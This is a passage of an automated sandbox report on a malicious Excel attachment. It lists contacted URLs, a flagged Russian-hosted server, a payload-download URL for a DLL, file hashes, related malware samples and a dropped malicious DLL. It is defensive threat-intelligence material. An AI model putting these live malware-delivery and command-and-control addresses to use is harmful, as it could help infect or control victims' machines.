                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                              		high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                		high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                  		high
                                                                                                  https://management.azure.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    		high
                                                                                                    https://wus2.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://incidents.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                      		high
                                                                                                      https://clients.config.office.net/user/v1.0/iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                        		high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                          		high
                                                                                                          https://o365auditrealtimeingestion.manage.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                            		high
                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                              		high
                                                                                                              https://api.office.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                		high
                                                                                                                https://incidents.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  		high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                    		high
                                                                                                                    http://www.amazon.com/msapplication.xml.20.drfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                          		high
                                                                                                                          http://www.twitter.com/msapplication.xml5.20.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                              		high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocationD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                		high
                                                                                                                                https://templatelogging.office.com/client/logD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office365.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://webshell.suite.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drtrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://management.azure.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://graph.windows.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://devnull.onenote.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ncus.pagecontentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://messaging.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://augloop.office.com/v2D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://quickbooks.aeymotors.com/soft.dllsharedStrings.bintrue
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://skyapi.live.net/Activity/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/macD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              185.233.80.31
                                                                                                                                                              		authd.feronok.comRussian Federation
                                                                                                                                                              		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                              50.87.220.158
                                                                                                                                                              		quickbooks.aeymotors.comUnited States
                                                                                                                                                              		46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                              Analysis ID:433009
                                                                                                                                                              Start date:11.06.2021
                                                                                                                                                              Start time:05:05:46
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 8m 30s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:light
                                                                                                                                                              Sample file name:my_attach_82862.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:46
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@15/67@7/2
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 4.7% (good quality ratio 4.4%)
                                                                                                                                                              • Quality average: 80.4%
                                                                                                                                                              • Quality standard deviation: 27.6%
                                                                                                                                                              HCA Information:Failed
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.139.144, 52.109.76.68, 52.109.12.21, 52.109.8.24, 13.88.21.125, 23.218.208.56, 20.82.209.183, 2.20.142.210, 2.20.142.209, 88.221.62.148, 20.54.26.129, 40.126.31.3, 40.126.31.136, 40.126.31.5, 40.126.31.140, 40.126.31.142, 40.126.31.2, 20.190.159.131, 40.126.31.7, 92.122.213.194, 92.122.213.247, 152.199.19.161, 20.54.7.98, 20.54.104.15
                                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              05:09:28API Interceptor1x Sleep call for process: regsvr32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              185.233.80.31SecuriteInfo.com..7135.dllGet hashmaliciousBrowse

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                authd.feronok.comSecuriteInfo.com..7135.dllGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.80.31
                                                                                                                                                                HP7cjYBnlS.dllGet hashmaliciousBrowse
                                                                                                                                                                • 47.254.173.212
                                                                                                                                                                1.dllGet hashmaliciousBrowse
                                                                                                                                                                • 34.95.62.189
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                info_71411.vbsGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                soft.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                Know.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                UNIFIEDLAYER-AS-1USFax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 162.241.7.171
                                                                                                                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 162.241.77.193
                                                                                                                                                                KCTC International Ltd.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.185.244
                                                                                                                                                                lTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.220.199.8
                                                                                                                                                                supply us this product.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.146.199
                                                                                                                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.74.169
                                                                                                                                                                3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.235.195
                                                                                                                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                HM-20210428 HBL.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.180.165
                                                                                                                                                                INQUIRY. ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.190.227
                                                                                                                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                research-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.142.232
                                                                                                                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.156.223
                                                                                                                                                                analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.156.223
                                                                                                                                                                SUPERSERVERSDATACENTERRUSecuriteInfo.com..7135.dllGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.80.31
                                                                                                                                                                2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
                                                                                                                                                                • 46.17.104.120
                                                                                                                                                                2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
                                                                                                                                                                • 46.17.104.120
                                                                                                                                                                8s5P8pdch5.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.81.8
                                                                                                                                                                0CUmIGFwMf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.88
                                                                                                                                                                y1e1FV1UWs.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.88
                                                                                                                                                                091WJ1BnKf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.230
                                                                                                                                                                svchost10.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.65.97
                                                                                                                                                                index.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.29
                                                                                                                                                                NATO_042021-1re4.docGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.29
                                                                                                                                                                8UOSzpl9E1.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.180.231.94
                                                                                                                                                                UWbkgpAQuS.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                9MyoOYNXKe.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.195.27.245
                                                                                                                                                                LJiW5jWnuA.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                tFqfAPK60I.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                svchost.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.65.97
                                                                                                                                                                m2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                m4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Docc.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\Public\SettingSyncY.dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U....><U....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U.........................PE..L....5.S...........!.....0...................@............................................@......................... >..[.......P................................'..P...8...............................@............................................text...{........0.................. ..`.data...,x...@.......4..............@....idata...............J..............@..@.rsrc................X..............@..@.reloc...'.......(...^..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99BBC3EB-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7725011658677239
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwhoGcprPzGwpLhaG/ap8GBGIpcgdihI1GvnZpvgdih4Goo1qp9gdihRGo4cEZpo:rmZlZa2IW0Gt0nf09lM0wQBgB
                                                                                                                                                                MD5:FD403206FBACF7BA1922FFEB229A78E9
                                                                                                                                                                SHA1:002B50B3B9B71BAF1D82B31E35987F42572A00A5
                                                                                                                                                                SHA-256:AB6C3DCC02DB8F8214D71C9249B0DFDC4C0F215ADF18F158A835B4A85E9B50DA
                                                                                                                                                                SHA-512:47B4E2A4EEADFDBB43B5317A114BDEEA051E184FFE9D52CF13BF60C14963FC1C7D04B8AC2230589028068416F77C62A8B4F337C61A0EC173B021E4DBCA8A530F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B403EC42-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7731605803059567
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwpGcproGwpLByG/ap8BP7GIpcBRA5GvnZpvBRAHGo2qp9BRARGo4lpmBRnjGWEE:rvZwZe2/WPbtP6fPxlMPpz4EB
                                                                                                                                                                MD5:8B153FC719E2A3E5D5199D05526C1B0B
                                                                                                                                                                SHA1:9E8B931ABFC5730E7E12E9CC2337102C868B66CF
                                                                                                                                                                SHA-256:6BFC1E01DAD1EC91AE4753B1C5F0C423A18B022CD638A23E0546B87F8CE52A38
                                                                                                                                                                SHA-512:AA7792863EF894CBFDF4AA8ECEE90B785BC6FF2B84FF783BDCE5797114E6FA4550FD38BAA07D6D894B555C47857CB9875452FAB1267F0218AC688C99C13B92AB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C1F50A27-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7753706536991711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwmEGcprEvGwpLp2G/ap8L9GIpchDNBGvnZpvhDsXGoalq1qp9hDXnWGo4GlqOly:rmYZEZZp02LvWhxOthHfh7RxMh1coXuB
                                                                                                                                                                MD5:45CE2DF9248F6EC1A9F3E0A8354CA162
                                                                                                                                                                SHA1:18E7FA0CC9C5ACEAB87D701AA684C51132237CAA
                                                                                                                                                                SHA-256:D0D79EB236F673501C6B2142B0E0C8786F3665D4241944DE2F993D3E160230EF
                                                                                                                                                                SHA-512:4BE21DF11415B8E7F6F9071BE63A2F5EB35DC68127769B66EAFCA83DB2BF6B877ABCE9AFCF212A546889824062105778D79C31001D9A1256FCF481000A0847C2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFEFB1DC-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7760345703977574
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwxGcprIGwpL8G/ap88clhGIpc8+FRGvnZpv8+FPGodqp98+FNGo4hpm8+2CGWne:rHZQZ+2ZljWPAtPyfP0hMPHcgOB
                                                                                                                                                                MD5:CD681ED6E3AB41F9B2BC5DD6D8FFF1EE
                                                                                                                                                                SHA1:3E384D392345F855F4744B727DA329BDEE4F5A01
                                                                                                                                                                SHA-256:93E4EDC208F1351F9BA4C9ADC6A25282744F23CA333270409F11A1B77E5CE594
                                                                                                                                                                SHA-512:FE70E480B75873D80E5CB03A8200419559AF7DE2E675637FE9512418D0BE0935F09B40CABE3ABBB370B34224365C0820A66011AC8B3589B057FD57357E4FB67F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27576
                                                                                                                                                                Entropy (8bit):1.9130107085336352
                                                                                                                                                                Encrypted:false
